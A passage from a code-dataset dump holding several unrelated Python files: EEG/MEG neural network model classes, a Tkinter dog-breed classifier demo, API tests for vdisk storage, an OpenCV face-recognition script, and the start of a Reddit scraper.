'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n return f\n\n\nclass VGG19(Model):\n \"\"\"\n VGG-19 model.\n\n References\n ----------\n\n \"\"\"\n def __init__(self, Dataset, params, specs):\n super().__init__(Dataset, params)\n self.specs = dict(n_ls=self.params['n_ls'], nonlin_out=tf.nn.relu,\n inch=1, padding='SAME', filter_length=(3, 3),\n domain='2d', stride=1, pooling=1, conv_type='2d')\n self.scope = 'vgg19'\n\n def build_graph(self):\n X1 = tf.expand_dims(self.X, -1)\n if X1.shape[1] == 306:\n X1 = tf.concat([X1[:, 0:306:3, :],\n X1[:, 1:306:3, :],\n X1[:, 2:306:3, :]], axis=3)\n self.specs['inch'] = 3\n\n vgg1 = vgg_block(2, ConvDSV, self.specs)\n out1 = vgg1(X1)\n\n self.specs['inch'] = self.specs['n_ls']\n self.specs['n_ls'] *= 2\n vgg2 = vgg_block(2, ConvDSV, self.specs)\n out2 = vgg2(out1)\n#\n self.specs['inch'] = self.specs['n_ls']\n self.specs['n_ls'] *= 2\n vgg3 = vgg_block(4, ConvDSV, self.specs)\n out3 = vgg3(out2)\n\n self.specs['inch'] = self.specs['n_ls']\n self.specs['n_ls'] *= 2\n vgg4 = vgg_block(4, ConvDSV, self.specs)\n out4 = vgg4(out3)\n#\n self.specs['inch'] = self.specs['n_ls']\n vgg5 = vgg_block(4, ConvDSV, self.specs)\n out5 = vgg5(out4)\n\n#\n fc_1 = Dense(size=4096, nonlin=tf.nn.relu, dropout=self.rate)\n fc_2 = Dense(size=4096, nonlin=tf.nn.relu, dropout=self.rate)\n fc_out = Dense(size=self.n_classes, nonlin=tf.identity,\n dropout=self.rate)\n y_pred = fc_out(fc_2(fc_1(out5)))\n return y_pred\n\n\nclass EEGNet(Model):\n \"\"\"EEGNet\n\n Parameters\n ----------\n eegnet_params : dict\n\n n_ls : int\n number of (temporal) convolution kernrels in the first layer.\n Defaults to 8\n\n filter_length : int\n length of temporal filters in the first layer.\n Defaults to 32\n\n stride : int\n stride of the average polling layers. Defaults to 4.\n\n pooling : int\n pooling factor of the average polling layers. Defaults to 4.\n\n dropout : float\n dropout coefficient\n\n References\n ----------\n [1] V.J. Lawhern, et al., EEGNet: A compact convolutional neural network\n for EEG-based brain–computer interfaces 10 J. Neural Eng., 15 (5) (2018),\n p. 056013\n\n [2] Original EEGNet implementation by the authors can be found at\n https://github.com/vlawhern/arl-eegmodels\n \"\"\"\n\n def build_graph(self):\n self.scope = 'eegnet'\n\n X1 = tf.expand_dims(self.X, -1)\n vc1 = ConvDSV(n_ls=self.specs['n_ls'], nonlin=tf.identity, inch=1,\n filter_length=self.specs['filter_length'], domain='time',\n stride=1, pooling=1, conv_type='2d')\n vc1o = vc1(X1)\n bn1 = tf.layers.batch_normalization(vc1o)\n dwc1 = ConvDSV(n_ls=1, nonlin=tf.identity, inch=self.specs['n_ls'],\n padding='VALID', filter_length=bn1.get_shape()[1].value,\n domain='space', stride=1, pooling=1,\n conv_type='depthwise')\n dwc1o = dwc1(bn1)\n bn2 = tf.layers.batch_normalization(dwc1o)\n out2 = tf.nn.elu(bn2)\n out22 = tf.nn.dropout(out2, self.rate)\n\n sc1 = ConvDSV(n_ls=self.specs['n_ls'], nonlin=tf.identity,\n inch=self.specs['n_ls'],\n filter_length=self.specs['filter_length']//4,\n domain='time', stride=1, pooling=1,\n conv_type='separable')\n\n sc1o = sc1(out22)\n bn3 = tf.layers.batch_normalization(sc1o)\n out3 = tf.nn.elu(bn3)\n out4 = tf.nn.avg_pool(out3, [1, 1, self.specs['pooling'], 1],\n [1, 1, self.specs['stride'], 1], 'SAME')\n out44 = tf.nn.dropout(out4, self.rate)\n\n sc2 = ConvDSV(n_ls=self.specs['n_ls']*2, nonlin=tf.identity,\n inch=self.specs['n_ls'],\n filter_length=self.specs['filter_length']//4,\n domain='time', stride=1, pooling=1,\n conv_type='separable')\n sc2o = sc2(out44)\n bn4 = tf.layers.batch_normalization(sc2o)\n out5 = tf.nn.elu(bn4)\n out6 = tf.nn.avg_pool(out5, [1, 1, self.specs['pooling'], 1],\n [1, 1, self.specs['stride'], 1], 'SAME')\n out66 = tf.nn.dropout(out6, self.rate)\n\n out7 = tf.reshape(out66, [-1, np.prod(out66.shape[1:])])\n fc_out = Dense(size=self.n_classes, nonlin=tf.identity,\n dropout=self.rate)\n y_pred = fc_out(out7)\n return y_pred\n\n\nclass LFCNN(Model):\n\n \"\"\"\n LF-CNN. Includes basic paramter interpretation options.\n\n For details see [1].\n\n Parameters\n ----------\n n_ls : int\n number of latent components\n Defaults to 32\n\n filter_length : int\n length of spatio-temporal kernels in the temporal\n convolution layer. Defaults to 7\n\n stride : int\n stride of the max pooling layer. Defaults to 1\n\n pooling : int\n pooling factor of the max pooling layer. Defaults to 2\n\n References\n ----------\n [1] I. Zubarev, et al., Adaptive neural network classifier for\n decoding MEG signals. Neuroimage. (2019) May 4;197:425-434\n \"\"\"\n\n def build_graph(self):\n \"\"\"\n Build computational graph using defined placeholder self.X as input\n\n Returns\n --------\n y_pred : tf.Tensor\n output of the forward pass of the computational graph.\n prediction of the target variable\n\n \"\"\"\n self.scope = 'var-cnn'\n self.demix = DeMixing(n_ls=self.specs['n_ls'])\n\n self.tconv1 = LFTConv(scope=\"conv\", n_ls=self.specs['n_ls'],\n nonlin_out=tf.nn.relu,\n filter_length=self.specs['filter_length'],\n stride=self.specs['stride'],\n pooling=self.specs['pooling'],\n padding=self.specs['padding'])\n\n self.fin_fc = Dense(size=self.n_classes,\n nonlin=tf.identity, dropout=self.rate)\n\n y_pred = self.fin_fc(self.tconv1(self.demix(self.X)))\n return y_pred\n\n def plot_out_weihts(self,):\n \"\"\"\n Plots the weights of the output layer\n\n \"\"\"\n from matplotlib import pyplot as plt\n\n f, ax = plt.subplots(1, self.n_classes)\n for i in range(self.n_classes):\n F = self.out_weights[..., i]\n times = self.specs['stride']*np.arange(F.shape[-1])/float(self.fs)\n t_step = np.diff(times)[0]\n pat, t = np.where(F == np.max(F))\n ax[i].pcolor(times, np.arange(self.specs['n_ls']), F, cmap='bone_r')\n ax[i].plot(times[t]+.5*t_step, pat+.5, markeredgecolor='red',\n markerfacecolor='none', marker='s', markersize=10,\n markeredgewidth=2)\n plt.show()\n\n def compute_patterns(self, megdata=None, output='patterns'):\n \"\"\"\n Computes spatial patterns from filter weights.\n\n Required for visualization.\n \"\"\"\n\n vis_dict = {self.handle: self.train_handle, self.rate: 1}\n spatial = self.sess.run(self.demix.W, feed_dict=vis_dict)\n self.filters = np.squeeze(self.sess.run(self.tconv1.filters,\n feed_dict=vis_dict))\n self.patterns = spatial\n\n if 'patterns' in output:\n data = self.sess.run(self.X, feed_dict=vis_dict)\n data = data.transpose([0, 2, 1])\n data = data.reshape([-1, data.shape[-1]])\n self.dcov, _ = ledoit_wolf(data)\n self.patterns = np.dot(self.dcov, self.patterns)\n if 'full' in output:\n lat_cov, _ = ledoit_wolf(np.dot(data, spatial))\n self.lat_prec = np.linalg.inv(lat_cov)\n self.patterns = np.dot(self.patterns, self.lat_prec)\n self.out_weights, self.out_biases = self.sess.run([self.fin_fc.w, self.fin_fc.b], feed_dict=vis_dict)\n self.out_weights = np.reshape(self.out_weights,\n [self.specs['n_ls'], -1, self.n_classes])\n\n def plot_patterns(self, sensor_layout='Vectorview-grad', sorting='l2',\n spectra=True, fs=None, scale=False, names=False):\n \"\"\"\n Plot informative spatial activations patterns for each class of stimuli\n\n Parameters\n ----------\n\n sensor_layout : str or mne.channels.Layout\n sensor layout. See mne.channels.read_layout for details\n\n sorting : str, optional\n\n spectra : bool, optional\n If True will also plot frequency responses of the associated\n temporal filters. Defaults to False\n\n fs : float\n sampling frequency\n\n scale : bool, otional\n If True will min-max scale the output. Defaults to False\n\n names : list of str, optional\n Class names\n\n Returns\n -------\n\n Figure\n\n \"\"\"\n from mne import channels, evoked, create_info\n import matplotlib.pyplot as plt\n from scipy.signal import freqz\n self.ts = []\n lo = channels.read_layout(sensor_layout)\n info = create_info(lo.names, 1., sensor_layout.split('-')[-1])\n self.fake_evoked = evoked.EvokedArray(self.patterns, info)\n nfilt = min(self.n_classes, 8)\n if sorting == 'l2':\n order = np.argsort(np.linalg.norm(self.patterns, axis=0, ord=2))\n elif sorting == 'l1':\n order = np.argsort(np.linalg.norm(self.patterns, axis=0, ord=1))\n elif sorting == 'contribution':\n nfilt = 3\n order = []\n for i in range(self.n_classes):\n inds = np.argsort(self.out_weights[..., i].sum(-1))[::-1]\n order += list(inds[:nfilt])\n order = np.array(order)\n elif sorting == 'best_spatial':\n nfilt = self.n_classes\n order = []\n for i in range(self.n_classes):\n pat = np.argmax(self.out_weights[..., i].sum(-1))\n order.append(pat)\n order = np.array(order)\n elif sorting == 'best':\n nfilt = self.n_classes\n order = []\n for i in range(self.n_classes):\n pat, t = np.where(self.out_weights[..., i] == np.max(self.out_weights[..., i]))\n order.append(pat[0])\n self.ts.append(t)\n order = np.array(order)\n elif sorting == 'best_neg':\n nfilt = self.n_classes\n order = []\n for i in range(self.n_classes):\n pat = np.argmin(self.out_weights[..., i].sum(-1))\n order.append(pat)\n elif sorting == 'worst':\n nfilt = self.n_classes\n order = []\n weight_sum = np.sum(np.abs(self.out_weights).sum(-1), -1)\n pat = np.argsort(weight_sum)\n order = np.array(pat[:nfilt])\n\n elif isinstance(sorting, list):\n nfilt = len(sorting)\n order = np.array(sorting)\n else:\n order = np.arange(self.specs['n_ls'])\n self.fake_evoked.data[:, :len(order)] = self.fake_evoked.data[:, order]\n if scale:\n self.fake_evoked.data[:, :len(order)] /= self.fake_evoked.data[:, :len(order)].max(0)\n self.fake_evoked.data[:, len(order):] *= 0\n self.out_filters = self.filters[:, order]\n order = np.array(order)\n if spectra:\n z = 2\n else:\n z = 1\n nrows = max(1, len(order)//nfilt)\n ncols = min(nfilt, len(order))\n\n f, ax = plt.subplots(z*nrows, ncols, sharey=True)\n f.set_size_inches([16,9])\n ax = np.atleast_2d(ax)\n for i in range(nrows):\n if spectra:\n for jj, flt in enumerate(self.out_filters[:, i*ncols:(i+1)*ncols].T):\n w, h = freqz(flt, 1)\n ax[z*i+1, jj].plot(w/np.pi*self.fs/2, np.abs(h))\n\n self.fake_evoked.plot_topomap(times=np.arange(i*ncols, (i+1)*ncols, 1.),\n axes=ax[z*i], colorbar=False,\n vmax=np.percentile(self.fake_evoked.data[:, :len(order)], 99),\n scalings=1, time_format='class # %g',\n title='Informative patterns ('+sorting+')')\n\n return f\n\n\nclass VARCNN(Model):\n\n \"\"\"VAR-CNN\n\n For details see [1].\n\n Parameters\n ----------\n n_ls : int\n number of latent components\n Defaults to 32\n\n filter_length : int\n length of spatio-temporal kernels in the temporal\n convolution layer. Defaults to 7\n\n stride : int\n stride of the max pooling layer. Defaults to 1\n\n pooling : int\n pooling factor of the max pooling layer. Defaults to 2\n\n References\n ----------\n [1] I. Zubarev, et al., Adaptive neural network classifier for\n decoding MEG signals. Neuroimage. (2019) May 4;197:425-434\n \"\"\"\n\n def build_graph(self):\n self.scope = 'var-cnn'\n self.demix = DeMixing(n_ls=self.specs['n_ls'])\n\n self.tconv1 = VARConv(scope=\"conv\", n_ls=self.specs['n_ls'],\n nonlin_out=tf.nn.relu,\n filter_length=self.specs['filter_length'],\n stride=self.specs['stride'],\n pooling=self.specs['pooling'],\n padding=self.specs['padding'])\n\n self.fin_fc = Dense(size=self.n_classes,\n nonlin=tf.identity, dropout=self.rate)\n\n y_pred = self.fin_fc(self.tconv1(self.demix(self.X)))\n\n return y_pred","sub_path":"mneflow/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":26133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"574910485","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 19 13:07:59 2020\n\n@author: Antoine\n\"\"\"\n\nfrom tkinter import *\nimport pandas as pd\nimport numpy as np\nfrom PIL import ImageTk\nfrom keras.preprocessing.image import load_img, img_to_array\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras import applications\n\n# Chargement du modele Keras\ntl_model = load_model('resultats/modeles_retenus/trl_classifier_inception.h5')\n\n# Chargement du mapping numero de classe / race de chien\nlabels = pd.read_csv('demo_data/dog_breed_mapping.csv', index_col='key')\n\n# Fonction activee lors de l'appui sur le boutton\n# \"Predire la race\"\ndef predict():\n \n global img_tk\n \n # Recupere le nom du chien (fichier) pour lequel faire une prediction\n file_loc = E1.get()\n \n # Chargement de l'image du chien\n img = load_img('demo_data/images/' + file_loc + '.jpg')\n width, height = img.size\n \n # Preprocessing de l'image\n preprocessed_img = applications.inception_v3.preprocess_input(img_to_array(img))\n preprocessed_img = np.expand_dims(preprocessed_img, axis=0) \n \n # Prediction des pobabilites pour chaque classe\n # et choix de la classe la plus probable\n prediction = tl_model.predict(preprocessed_img)\n breed_prob = prediction.max()\n breed_pred = labels.loc[np.argmax(prediction, axis=1)[0], 'breed']\n print(breed_pred)\n \n # Conversion de l'image du chien en format utilise par TKinter\n img_tk = ImageTk.PhotoImage(img)\n # Creation de la fenetre qui contiendra l'image du chien\n image_display = Toplevel(fenetre)\n \n # Affichage de l'image choisie\n canvas = Canvas(image_display, width = width, height = height)\n canvas.create_image((0, 0),anchor=NW, image=img_tk)\n canvas.pack(side = BOTTOM, padx=5, pady=5)\n\n # Affichage de la prediction de la race au dessus de l'image\n L2_text = file_loc + ' est probablement un ' + breed_pred + ' (p = ' + str(breed_prob)[:4] + ')'\n L2 = Label(image_display, text=L2_text)\n L2.pack( side = TOP, padx=5, pady=5)\n\n# Creation de la fenetre principale de l'interface\nfenetre = Tk()\n\nL1 = Label(fenetre, text = \"Nom du chien\")\nL1.pack( side = LEFT)\n\nB = Button(fenetre, text = \"Predire la race\", command = predict)\nB.pack(side = RIGHT)\n\nfile_loc = StringVar()\nfile_loc.set('hector')\nE1 = Entry(fenetre, textvariable=file_loc , bd = 3, width=30)\nE1.pack(side = RIGHT)\n\n\n\nfenetre.mainloop()\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"554510360","text":"import random, time\nfrom testcases.testcases_base import TestcasesBase\nimport unittest\n\n\nclass TestVdisks(TestcasesBase):\n\n @classmethod\n def setUpClass(cls):\n self = cls()\n super(TestVdisks, self).setUp()\n TestcasesBase().setUp()\n \n nodes = [self.nodeid]\n number_of_free_disks, disk_type = self.get_max_available_free_disks(nodes)\n storageclusters = self.storageclusters_api.get_storageclusters()\n if not storageclusters.json():\n if not number_of_free_disks:\n self.skipTest('[*] No free disks to create storagecluster')\n\n self.lg.info('[*] Deploy new storage cluster (SC0)')\n response, data = self.storageclusters_api.post_storageclusters(\n nodes=nodes,\n driveType=disk_type,\n servers=random.randint(1, number_of_free_disks)\n )\n self.assertEqual(response.status_code, 201)\n storagecluster = data['label']\n else:\n storagecluster = storageclusters.json()[0]\n\n self.lg.info('[*] Create vdiskstorage (VDS0)')\n response, vdiskstoragedata = self.vdisks_api.post_vdiskstorage(storagecluster=storagecluster)\n self.assertEqual(response.status_code, 201)\n\n self.lg.info('[*] Import Image (IMG0) for (VDS0)')\n response, imagedata = self.vdisks_api.post_import_image(vdiskstorageid=vdiskstoragedata['id'])\n self.assertEqual(response.status_code, 201)\n\n TestVdisks.vdiskstoragedata = vdiskstoragedata\n TestVdisks.imagedata = imagedata \n\n @classmethod\n def tearDownClass(cls):\n self = cls()\n self.lg.info('[*] Delete imported image')\n self.vdisks_api.delete_image(TestVdisks.vdiskstoragedata['id'], TestVdisks.imagedata['imageName'])\n self.lg.info('[*] Delete vdiskstorage')\n self.vdisks_api.delete_vdiskstorage(TestVdisks.vdiskstoragedata['id'])\n super(TestVdisks, cls).tearDownClass()\n\n def setUp(self):\n super().setUp()\n self.lg.info(' [*] Create vdisk (VD0)')\n response, self.data = self.vdisks_api.post_vdisks(\n vdiskstorageid=self.vdiskstoragedata['id'], \n imageid=self.imagedata['imageName']\n )\n self.assertEqual(response.status_code, 201)\n\n def tearDown(self):\n self.lg.info(' [*] Delete vdisk (VD0)')\n self.vdisks_api.delete_vdisks_vdiskid(self.vdiskstoragedata['id'], self.data['id'])\n super().tearDown()\n\n def test001_get_vdisk_details(self):\n \"\"\" GAT-061\n *GET:/vdisks/{vdiskid}*\n\n **Test Scenario:**\n\n #. Create vdisk (VD0).\n #. Get vdisk (VD0), should succeed with 200.\n #. Get nonexisting vdisk, should fail with 404.\n\n \"\"\"\n self.lg.info(' [*] Get vdisk (VD0), should succeed with 200')\n response = self.vdisks_api.get_vdisks_vdiskid(self.vdiskstoragedata[\"id\"], self.data['id'])\n self.assertEqual(response.status_code, 200)\n for key in self.data.keys():\n if key in list(response.json().keys()):\n self.assertEqual(self.data[key], response.json()[key])\n self.assertEqual(response.json()['status'], 'halted')\n\n self.lg.info(' [*] Get nonexisting vdisk, should fail with 404')\n response = self.vdisks_api.get_vdisks_vdiskid(self.vdiskstoragedata[\"id\"], self.rand_str())\n self.assertEqual(response.status_code, 404)\n\n def test002_list_vdisks(self):\n \"\"\" GAT-062\n *GET:/vdisks*\n\n **Test Scenario:**\n\n #. Create vdisk (VD0).\n #. List vdisks, should succeed with 200.\n\n \"\"\"\n self.lg.info(' [*] List vdisks, should succeed with 200')\n response = self.vdisks_api.get_vdisks(self.vdiskstoragedata[\"id\"])\n self.assertEqual(response.status_code, 200)\n vd0_data = {\"id\": self.data['id'],\n \"vdiskstorage\": self.vdiskstoragedata[\"id\"],\n \"type\": self.data['type']\n }\n self.assertIn(vd0_data, response.json())\n\n def test003_create_vdisk(self):\n \"\"\" GAT-063\n *POST:/vdisks*\n\n **Test Scenario:**\n\n #. Create vdisk (VD1). should succeed with 201.\n #. List vdisks, (VD1) should be listed.\n #. Create vdisk with invalid body, should fail with 400.\n \"\"\"\n self.lg.info(' [*] List vdisks, (VD1) should be listed')\n response = self.vdisks_api.get_vdisks(self.vdiskstoragedata[\"id\"])\n self.assertEqual(response.status_code, 200)\n self.assertIn(self.data['id'], [x['id'] for x in response.json()])\n\n self.lg.info(' [*] Create vdisk with invalid body, should fail with 400')\n body = {\"id\": self.rand_str(),\"type\":\"cash\", \"imageId\":self.imagedata[\"imageName\"]}\n response, data= self.vdisks_api.post_vdisks(vdiskstorageid=self.vdiskstoragedata[\"id\"],** body)\n self.assertEqual(response.status_code, 400)\n\n def test004_delete_vdisk(self):\n \"\"\" GAT-064\n *Delete:/vdisks/{vdiskid}*\n\n **Test Scenario:**\n\n #. Create vdisk (VD0).\n #. Delete vdisk (VD0), should succeed with 204.\n #. List vdisks, (VD0) should be gone.\n #. Delete nonexisting vdisk, should fail with 204.\n \"\"\"\n self.lg.info(' [*] Delete vdisk (VD0), should succeed with 204')\n response = self.vdisks_api.delete_vdisks_vdiskid(self.vdiskstoragedata[\"id\"], self.data['id'])\n self.assertEqual(response.status_code, 204)\n\n self.lg.info(' [*] List vdisks, (VD0) should be gone')\n response = self.vdisks_api.get_vdisks(self.vdiskstoragedata[\"id\"])\n self.assertEqual(response.status_code, 200)\n self.assertNotIn(self.data['id'], [x['id'] for x in response.json()])\n\n self.lg.info(' [*] Delete nonexisting vdisk, should fail with 204')\n response = self.vdisks_api.delete_vdisks_vdiskid(self.vdiskstoragedata[\"id\"], 'fake_vdisk')\n self.assertEqual(response.status_code, 204)\n\n def test005_resize_vdisk(self):\n \"\"\" GAT-065\n *POST:/vdisks/{vdiskid}/resize*\n\n **Test Scenario:**\n\n #. Create vdisk (VD0).\n #. Resize vdisk (VD0), should succeed with 204.\n #. Check that size of volume changed, should succeed.\n #. Resize vdisk (VD0) with value less than the current vdisk size, should fail with 400.\n #. Check vdisk (VD0) size, shouldn't be changed.\n\n \"\"\"\n self.lg.info(' [*] Resize vdisk (VD0), should succeed with 204')\n current_size = self.data['size']\n new_size = current_size + random.randint(1, 10)\n body = {\"newSize\": new_size}\n response = self.vdisks_api.post_vdisks_vdiskid_resize(self.vdiskstoragedata[\"id\"],self.data['id'], body)\n self.assertEqual(response.status_code, 204)\n\n self.lg.info(' [*] Check that size of volume changed, should succeed')\n response = self.vdisks_api.get_vdisks_vdiskid(self.vdiskstoragedata[\"id\"],self.data['id'])\n self.assertEqual(response.status_code, 200)\n self.assertEqual(new_size, response.json()['size'])\n current_size = new_size\n\n self.lg.info(' [*] Resize vdisk (VD0) with value less than the current vdisk size, should fail with 400')\n new_size = current_size - random.randint(1, current_size - 1)\n body = {\"newSize\": new_size}\n response = self.vdisks_api.post_vdisks_vdiskid_resize(self.vdiskstoragedata[\"id\"],self.data['id'], body)\n self.assertEqual(response.status_code, 400)\n\n self.lg.info(' [*] Check vdisk (VD0) size, shouldn\\'t be changed')\n response = self.vdisks_api.get_vdisks_vdiskid(self.vdiskstoragedata[\"id\"],self.data['id'])\n self.assertEqual(response.status_code, 200)\n self.assertNotEqual(new_size, response.json()['size'])\n\n @unittest.skip(' https://github.com/zero-os/0-orchestrator/issues/1260')\n def test006_list_delete_vdiskstorage(self):\n \"\"\" GAT-143\n *GET:/vdiskstorage*\n\n **Test Scenario:**\n\n #. Create vdiskstorage (VDS0), import image (IM0) and create vdisk (VD0).\n #. Delete vdiskStorage (VDS0), should fail with 400 as VDS0 consume IM0 and VD0.\n #. List vdisksStorage, should succeed with 200.\n #. Delete vdisk (VD0) and image (IM0), should succeed\n #. Delete vdiskStorage (VDS0), should succeed with 204.\n #. List vdisks, (VDS0) should be gone.\n #. Delete nonexisting vdisk, should fail with 204.\n\n \"\"\"\n self.lg.info(' [*] List vdisksStorage, should succeed with 200')\n response = self.vdisks_api.get_vdiskstorage()\n self.assertEqual(response.status_code, 200)\n svd0_data = {\"id\": self.vdiskstoragedata['id'],\n \"blockCluster\": self.vdiskstoragedata['blockCluster'],\n \"objectCluster\": '',\n \"slaveCluster\": ''}\n self.assertIn(svd0_data, response.json())\n\n self.lg.info('Delete vdiskStorage (VDS0), should fail with 400 as VDS0 consume IM0 and VD0')\n response = self.vdisks_api.delete_vdiskstorage(self.vdiskstoragedata[\"id\"])\n self.assertEqual(response.status_code, 400)\n\n self.lg.info(' [*] Delete vdisk (VD0)')\n response = self.vdisks_api.delete_vdisks_vdiskid(self.vdiskstoragedata[\"id\"], self.data['id'])\n self.assertEqual(response.status_code, 204)\n\n self.lg.info(' [*] Delete Image (IMG0)')\n response = self.vdisks_api.delete_image(self.vdiskstoragedata[\"id\"], self.imagedata['imageName'])\n self.assertEqual(response.status_code, 204)\n\n self.lg.info('Delete vdiskStorage (VDS0), should succeed with 204')\n response = self.vdisks_api.delete_vdiskstorage(self.vdiskstoragedata[\"id\"])\n self.assertEqual(response.status_code, 204)\n\n self.lg.info('List vdiskStorages, (VDS0) should be gone')\n response = self.vdisks_api.get_vdiskstorage()\n self.assertEqual(response.status_code, 200)\n self.assertNotIn(svd0_data, response.json())\n\n self.lg.info('Delete nonexisting vdiskStorage, should fail with 204')\n response = self.vdisks_api.delete_vdiskstorage(self.vdiskstoragedata[\"id\"])\n self.assertEqual(response.status_code, 204)\n\n @unittest.skip(\"https://github.com/zero-os/0-orchestrator/issues/1148\")\n def test007_list_vdisk_images(self):\n \"\"\" GAT-144\n *GET:/vdisks_Images*\n\n **Test Scenario:**\n\n #. Create vdiskstorage (VDS0).\n #. Import Image IMG0.\n #. List all vdiskstorage images, should succeed with 200.\n\n \"\"\"\n self.lg.info(' [*] List all vdiskstorage Images, should succeed with 200')\n response = self.vdisks_api.get_import_images(self.vdiskstoragedata[\"id\"])\n self.assertEqual(response.status_code, 200)\n img0_data = {\"name\": self.imagedata[\"imageName\"],\n \"size\": self.imagedata['size'],\n \"diskBlockSize\": self.imagedata['diskBlockSize']\n }\n self.assertIn(img0_data, response.json())\n\n def test008_get_vdiskstorage_details(self):\n \"\"\" GAT-145\n *GET:/vdiskstorage/{vdiskstorageid}*\n\n **Test Scenario:**\n\n #. Create vdiskstorage (VDS0).\n #. Get vdiskstorage (VDS0), should succeed with 200.\n #. Get nonexisting vdiskstorage, should fail with 404.\n\n \"\"\"\n self.lg.info(' [*] Get vdisk (VDS0), should succeed with 200')\n response = self.vdisks_api.get_vdiskstorage_info(self.vdiskstoragedata[\"id\"])\n self.assertEqual(response.status_code, 200)\n for key in self.vdiskstoragedata.keys():\n if key in list(response.json().keys()):\n self.assertEqual(self.vdiskstoragedata[key], response.json()[key])\n self.lg.info(' [*] Get nonexisting vdiskstorage, should fail with 404')\n response = self.vdisks_api.get_vdiskstorage_info(self.rand_str())\n self.assertEqual(response.status_code, 404)\n\n @unittest.skip('https://github.com/zero-os/0-orchestrator/issues/1148')\n def test009_get_Imported_Image_details(self):\n \"\"\" GAT-146\n *GET:/vdiskstorage/{vdiskstorageid}*\n\n **Test Scenario:**\n\n #. Create vdiskstorage (VDS0).\n #. Import Image IMG0.\n #. Get Imported Image(IMG0), should succeed with 200.\n #. Get nonexisting image, should fail with 404.\n\n \"\"\"\n\n self.lg.info('Get Imported Image(IMG0), should succeed with 200.')\n response = self.vdisks_api.get_image_info(self.vdiskstoragedata[\"id\"], self.imagedata[\"imageName\"])\n self.assertEqual(response.status_code, 200)\n for key in self.imagedata.keys():\n if key in list(response.json().keys()):\n self.assertEqual(self.imagedata[key], response.json()[key])\n\n self.lg.info(' [*] Get nonexisting image, should fail with 404')\n fake_image = self.rand_str()\n response = self.vdisks_api.get_image_info(self.vdiskstoragedata[\"id\"], fake_image)\n self.assertEqual(response.status_code, 404)\n\n def test010_delete_vdisk_attached_to_vm(self):\n \"\"\" GAT-155\n *GET:/vdiskstorage/{vdiskstorageid}*\n\n **Test Scenario:**\n\n #. Create vdiskstorage (VDS0), should succeed.\n #. Import image (IMG0) to vdiskstorage (VDS0), should succeed.\n #. Create vdisk (VD0) with image (IMG0), should succeed.\n #. Create virtual machine (VM0), should succeed.\n #. Delete vdisk (VD0), should fail as vritual machine (VM0) is attatched to it.\n #. Delete virtual machine (VM0), should succeed.\n #. Delete vdisk (VD0), should succeed.\n\n \"\"\"\n self.lg.info('Create virtual machine (VM0), should succeed')\n disks = [{\"vdiskid\": self.data['id'], \"maxIOps\": 2000}]\n response, vmdata = self.vms_api.post_nodes_vms(node_id=self.nodeid, memory=1024, cpu=1, disks=disks)\n self.assertTrue(response.status_code, 201)\n\n self.lg.info('Delete vdisk (VD0), should fail as vritual machine (VM0) is attatched to it') \n response = self.vdisks_api.delete_vdisks_vdiskid(self.vdiskstoragedata[\"id\"], self.data['id'])\n self.assertTrue(response.status_code, 400)\n\n self.lg.info('Delete virtual machine (VM0), should succeed') \n response = self.vms_api.delete_nodes_vms_vmid(self.nodeid, vmdata['id'])\n self.assertTrue(response.status_code, 204)\n\n self.lg.info('Delete vdisk (VD0), should succeed') \n response = self.vdisks_api.delete_vdisks_vdiskid(self.vdiskstoragedata[\"id\"], self.data['id'])\n self.assertTrue(response.status_code, 204)\n\n","sub_path":"tests/0_orchestrator/test_suite/testcases/basic_tests/test06_vdisks_apis.py","file_name":"test06_vdisks_apis.py","file_ext":"py","file_size_in_byte":14644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"145656644","text":"import cv2\nimport winsound\n\n# zero(0) is for single camera if you've ultiple camera you can change with 1,2,3,4..... etc \ncam = cv2.VideoCapture(0,cv2.CAP_DSHOW)\nwhile cam.isOpened(): \n haar_cascade = cv2.CascadeClassifier('haar_face.xml')\n\n people = ['pp']\n # features = np.load('features.npy', allow_pickle=True)\n # labels = np.load('labels.npy')\n\n face_recognizer = cv2.face.LBPHFaceRecognizer_create()\n face_recognizer.read('face_trained.yml')\n\n img = cv2.imread(r'F:\\pic\\riz.jpg')\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n cv.imshow('Person', gray)\n\n # Detect the face in the image\n faces_rect = haar_cascade.detectMultiScale(gray, 1.1, 4)\n\n for (x,y,w,h) in faces_rect:\n faces_roi = gray[y:y+h,x:x+w]\n\n label, confidence = face_recognizer.predict(faces_roi)\n print(f'Label = {people[label]} with a confidence of {confidence}')\n\n cv2.putText(img, str(people[label]), (20,20), cv.FONT_HERSHEY_COMPLEX, 1.0, (0,255,0), thickness=2)\n cv2.rectangle(img, (x,y), (x+w,y+h), (0,255,0), thickness=2)\n\n cv2.imshow('Detected Face', img)\n if cv2.waitKey(10) == ord('q'):\n break\n","sub_path":"Face Recgnition/face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"599813965","text":"\"\"\"\nScraper for /r/changemyview data\n\"\"\"\n\nimport os\nimport time\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport praw\nimport argparse\nfrom utils import can_fail\nfrom cmv_types import GatherSub, GatherCMVSub, GatherComment, GatherCMVComment, GatherCMVSubAuthor\nfrom cmv_tables import init_tables\n\n# sqlalchemy imports\nimport sqlalchemy\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nEND_2016 = 1483228800\nSTART_2013 = 1356998400\nSTART_2015 = 1420070400\nSTART_2016 = 1451606400\nJAN_20_2016 = 1453334399 \nJAN_4_2016 = 1451811999\nMID_2016 = 1464739200\n\nSTART_BDAY_2016 = 1461110400\nEND_BDAY_2016 = 1461130000\n\n\n\n\n\n\nclass CMVScraper:\n \"\"\"\n Class to scrape /r/changemyview for MACS 302 and possibly thesis.\n \"\"\"\n def __init__(self, 